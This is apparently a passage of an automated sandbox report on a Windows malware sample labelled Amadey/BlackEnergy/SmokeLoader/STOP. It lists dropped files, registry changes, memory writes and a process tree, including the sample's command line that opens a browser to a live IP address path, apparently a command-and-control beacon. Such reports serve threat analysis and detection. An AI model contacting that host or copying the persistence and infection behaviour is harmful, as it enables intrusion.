C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\r\CheckNetIsolation.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-aarsvc_31bf3856ad364e35_10.0.22000.1_none_b9334c2faa2133a2\agentactivationruntimestarter.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_6b2d7072c225a87c\r\WerFault.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-gdi_31bf3856ad364e35_10.0.22000.132_none_a52f79fedfba2bb3\fontdrvhost.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-smss-minwin_31bf3856ad364e35_10.0.22000.1_none_d4a473e8ed9480cf\smss.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\r\XGpuEjectDialog.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.22000.318_none_2bc95a47eaa37094\hvax64.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.22000.1_none_3b89d92484239859\psr.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\r\Taskmgr.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-pnp-drvinst_31bf3856ad364e35_10.0.22000.1_none_aba17b366eb3e321\drvinst.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_c26272ecb066f6ab\ByteCodeGenerator.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-b..ment-windows-minwin_31bf3856ad364e35_10.0.22000.318_none_4b63ad41811cb76d\f\winload.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_478d6c55833b17ab\dcdiag.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_03f10908532480fe\PickerHost.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.22000.1_none_4d8388bf67ce9090\pwlauncher.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\PinningConfirmationDialog.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\msil_addinprocess_b77a5c561934e089_10.0.22000.1_none_f1c351dedf09f213\AddInProcess.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-wmi-core-svc_31bf3856ad364e35_10.0.22000.1_none_014b03c8301af3f9\WinMgmt.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-deviceenroller_31bf3856ad364e35_10.0.22000.469_none_bc884b259290e3bf\r\DeviceEnroller.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\PeopleExperienceHost.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\r\SecurityHealthSystray.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-atbroker_31bf3856ad364e35_10.0.22000.1_none_25e44d77231e4b64\AtBroker.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_4634d5a384238dfd\r\dsmgmt.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\x86_microsoft-windows-ie-feedsbs_31bf3856ad364e35_11.0.22000.1_none_2a646c04920783d6\msfeedssync.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ice-daf-pospayments_31bf3856ad364e35_10.0.22000.1_none_abd5b42ed12df708\pospaymentsworker.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1853774386" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31190320" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" IEXPLORE.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961046444521985" msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1418876453-2228697459-2788511057-1000\{485D920B-9929-4D58-BCA8-339A43C5A821} msedge.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4152 msedge.exe 4152 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5292 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3064 wrote to memory of 1184 3064 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe 78 PID 3064 wrote to memory of 1184 3064 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe 78 PID 1184 wrote to memory of 5292 1184 IEXPLORE.exe 79 PID 1184 wrote to memory of 5292 1184 IEXPLORE.exe 79 PID 5292 wrote to memory of 5444 5292 msedge.exe 80 PID 5292 wrote to memory of 5444 5292 msedge.exe 80 PID 5292 wrote to memory of 5136 5292 msedge.exe 81 PID 5292 wrote to memory of 5136 5292 msedge.exe 81 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Program Files\Internet Explorer\IEXPLORE.exe"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://212.33.237.86/images/1/report.php"3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5292 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffcb88ff208,0x7ffcb88ff214,0x7ffcb88ff2204⤵PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:114⤵PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2136,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:24⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:134⤵PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:14⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3356,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3404 /prefetch:14⤵PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:144⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:144⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:144⤵PID:2616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:144⤵PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:144⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:144⤵PID:5932
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11285⤵PID:1792
-
-
-
